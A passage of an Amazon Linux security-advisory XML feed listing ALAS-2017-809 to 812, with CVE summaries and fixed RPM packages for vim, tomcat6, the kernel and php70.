release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-xml" 
version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.30-1.133.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2017-809</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-809: low priority package update for vim</title><issued date="2017-03-29 16:45:00" /><updated date="2017-03-29 21:43:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6350:
An integer overflow flaw was found in the way vim handled tree length values when reading an undo file. This bug could result in vim crashing when trying to process corrupted undo files.
1427945:
CVE-2017-6350 vim: Integer overflow at an unserialize_uep memory allocation site
CVE-2017-6349:
An integer overflow flaw was found in the way vim handled undo files. This bug could result in vim crashing when trying to process corrupted undo files.
1427944:
CVE-2017-6349 vim: Integer overflow at a u_read_undo memory allocation site
CVE-2017-5953:
vim before patch 8.0.0322 does not properly validate values for tree length when handling a spell file, which may result in an integer overflow at a memory allocation site and a resultant buffer overflow.
1421613:
CVE-2017-5953 vim: Tree length values not validated properly when handling a spell file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5953" title="" id="CVE-2017-5953" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6349" title="" id="CVE-2017-6349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6350" title="" id="CVE-2017-6350" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-enhanced" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-filesystem-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.0.0503-1.45.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.0.0503-1.45.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.0.0503-1.45.amzn1.i686.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.45.amzn1" epoch="2" 
arch="i686"><filename>Packages/vim-filesystem-8.0.0503-1.45.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.0.0503-1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-810</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-810: medium priority package update for tomcat6</title><issued date="2017-03-29 16:48:00" /><updated date="2017-03-29 22:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8745:
1403824:
CVE-2016-8745 tomcat: information disclosure due to incorrect Processor sharing
CVE-2016-6816:
It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web cache, perform an XSS attack, or obtain sensitive information from requests other than their own.
1397484:
CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816" title="" id="CVE-2016-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8745" title="" id="CVE-2016-8745" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:0527.html" title="" id="RHSA-2017:0527" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-webapps" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.51" release="1.10.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.51-1.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-811</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-811: important priority package update for kernel</title><issued date="2017-03-29 17:59:00" /><updated date="2017-03-29 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7184:
CVE-2017-6347:
The skbs processed by ip_cmsg_recv() are not guaranteed to be linear (e.g. when sending UDP packets over loopback with MSG_MORE). Using csum_partial() on potentially the whole skb length is dangerous; instead, be on the safe side and use skb_checksum(). This may lead to an information leak, as kernel memory may be checksummed and sent as part of the packet.
1427984:
CVE-2017-6347 kernel: ipv4: Incorrect IP_CHECKSUM handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6347" title="" id="CVE-2017-6347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7184" title="" id="CVE-2017-7184" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" 
version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.51" release="40.60.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.4.51-40.60.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-812</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-812: medium priority package update for php70</title><issued date="2017-03-29 20:15:00" /><updated date="2017-03-29 22:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5340:
Zend/zend_hash.c in PHP before 7.0.15 and 7.1.x before 7.1.1 mishandles certain cases that require large array allocations, which allows remote attackers to execute arbitrary code or cause a denial of service (integer overflow, uninitialized memory access, and use of arbitrary destructor function pointers) via crafted serialized data.
1412631:
CVE-2017-5340 php: Use of uninitialized memory in unserialize()
CVE-2016-7479:
In all versions of PHP 7, during the unserialization process, resizing the &#039;properties&#039; hash table of a serialized object may lead to use-after-free. A remote attacker may exploit this bug to gain arbitrary code execution.
1412686:
CVE-2016-7479 php: Use-after-free vulnerability when resizing the 'properties' hash table of a serialized object
CVE-2016-10168:
Integer overflow in gd_io.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to have unspecified impact via vectors involving the number of horizontal and vertical chunks in an image.
1418986:
CVE-2016-10168 gd: Integer overflow in gd_io.c
CVE-2016-10167:
The gdImageCreateFromGd2Ctx function in gd_gd2.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to cause a denial of service (application crash) via a crafted image file.
1418984:
CVE-2016-10167 gd: DoS vulnerability in gdImageCreateFromGd2Ctx()
CVE-2016-10162:
The php_wddx_pop_element function in ext/wddx/wddx.c in PHP 7.0.x before 7.0.15 and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an inapplicable class name in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.
1419012:
CVE-2016-10162 php: Null pointer dereference when unserializing PHP object
CVE-2016-10161:
The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.
1419010:
CVE-2016-10161 php: Out-of-bounds heap read on unserialize in finish_nested_data()
CVE-2016-10160:
Off-by-one error in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted PHAR archive with an alias mismatch.
1419018:
CVE-2016-10160 php: Off-by-one error in phar_parse_pharfile when loading crafted phar archive
CVE-2016-10159:
Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.
1419020:
CVE-2016-10159 php: Integer overflow in phar_parse_pharfile
CVE-2016-10158:
It was found that the exif_convert_any_to_int() function in PHP was vulnerable to floating point exceptions when parsing tags in image files. A remote attacker with the ability to upload a malicious image could crash PHP, causing a Denial of Service.
1419015:
CVE-2016-10158 php: Wrong calculation in exif_convert_any_to_int function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10158" title="" id="CVE-2016-10158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10159" title="" id="CVE-2016-10159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10160" title="" id="CVE-2016-10160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10161" title="" id="CVE-2016-10161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10162" title="" id="CVE-2016-10162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10167" title="" id="CVE-2016-10167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10168" title="" id="CVE-2016-10168" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7479" title="" id="CVE-2016-7479" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5340" title="" id="CVE-2017-5340" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-process" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.16" release="1.21.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-cli-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.16" 
release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package 
name="php70-pdo-dblib" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.16" release="1.21.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-gmp-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.16" release="1.21.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-pdo-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.16" release="1.21.amzn1" epoch="0" 
